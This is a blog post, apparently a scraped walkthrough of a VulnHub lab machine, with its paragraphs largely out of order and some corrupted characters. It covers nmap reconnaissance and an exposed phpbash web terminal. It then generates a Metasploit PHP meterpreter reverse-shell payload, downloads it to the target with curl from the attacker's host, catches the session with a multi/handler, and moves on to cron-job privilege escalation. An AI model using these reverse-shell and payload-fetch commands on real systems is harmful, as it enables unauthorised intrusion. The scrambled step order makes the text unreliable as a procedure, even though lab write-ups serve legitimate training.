12/11/2023 0 Comments Simple php reverse shell![]() The machine has two vulnerabilities that will help you escalate privileges If you are new to cron jobs or you want a refresher on the same, I have already posted part 1 and part 2 specifically on exploiting cron job misconfigurations On checking further, I found a cronjob run and create the archives in /backup/armour. On checking files in the current directory, I came across a readme file that's telling cat readme.txt Well you can do this by executing an interactive process via meterpreter meterpreter> execute -f /bin/bash -i -a "-i" Privilege Escalation ![]() Now open 192.168.1.7:8090/shell.php in browser and you will see reverse connection spawning meterpreter sessionīut we wanted a Linux shell access, not meterpreter (again third party shell). You can use a python HTTP server to spin up a simple file server and ship your exploit on the target machine curl 192.168.1.7:8090/shell.php -o shell.php Now if you will see, curl is installed on the system and using phpbash, download the shell.php file. I will be posting some Metasploit specific articles soon. If you are new to Metasploit, stay tuned. ![]() Msf6 exploit(multi/handler) > set lhost 192.168.1.7 ![]() Msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp Using configured payload generic/shell_reverse_tcp Msf6 payload(php/meterpreter/reverse_tcp) > use exploit/multi/handler Msf6 payload(php/meterpreter/reverse_tcp) > generate -f raw -o shell.php Msf6 payload(php/meterpreter/reverse_tcp) > set lhost 192.168.1.7 It's better to get an interactive meterpreter session and continue post-exploitationĬreating a simple PHP reverse shell using msfconsole and run exploit/multi/handler msf6 > use payload/php/meterpreter/reverse_tcp So relying on a third-party application in such cases is not a cool idea. The phpbash is indeed an initial foothold, but still, we need to perform some shell specific tasks like redirection or whatnot. If you don't know what is phpbash, it is basically an interactive web interface to the terminal that can execute commands on the server and return back output of it Initial Foothold Let's enumerate it further using Nmap HTML scripts nmap 192.168.1.205 -p80 -sCįound entry of /phpbash.php. Since the webpage couldn't give any more information. On checking the website, it only has one pic that has a link to some cybersecurity training website. This time searching for open ports and services running on it. I will be using it for further enumeration. In my case, the IP of the box is 192.168.1.205. Using Nmap, we can do this by passing -sn flag nmap -sn 192.168.1.0-255 By default, it tries to scan for open ports, but that would be time-consuming, so let's disable it for now and get only the list of live hosts. Reconnaissanceįirst of all, since DHCP is enabled, you need to find the IP address of the box. I will let you configure the machine on your own, we will start from the recon step. The machine I have used is available on VulnHub: When you get a root user from an existing and running web app, it's known as web to root. Hello there everyone! This is a beginner-friendly box and in this, you will learn how to get the root user of a running Linux instance running a vulnerable web application.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |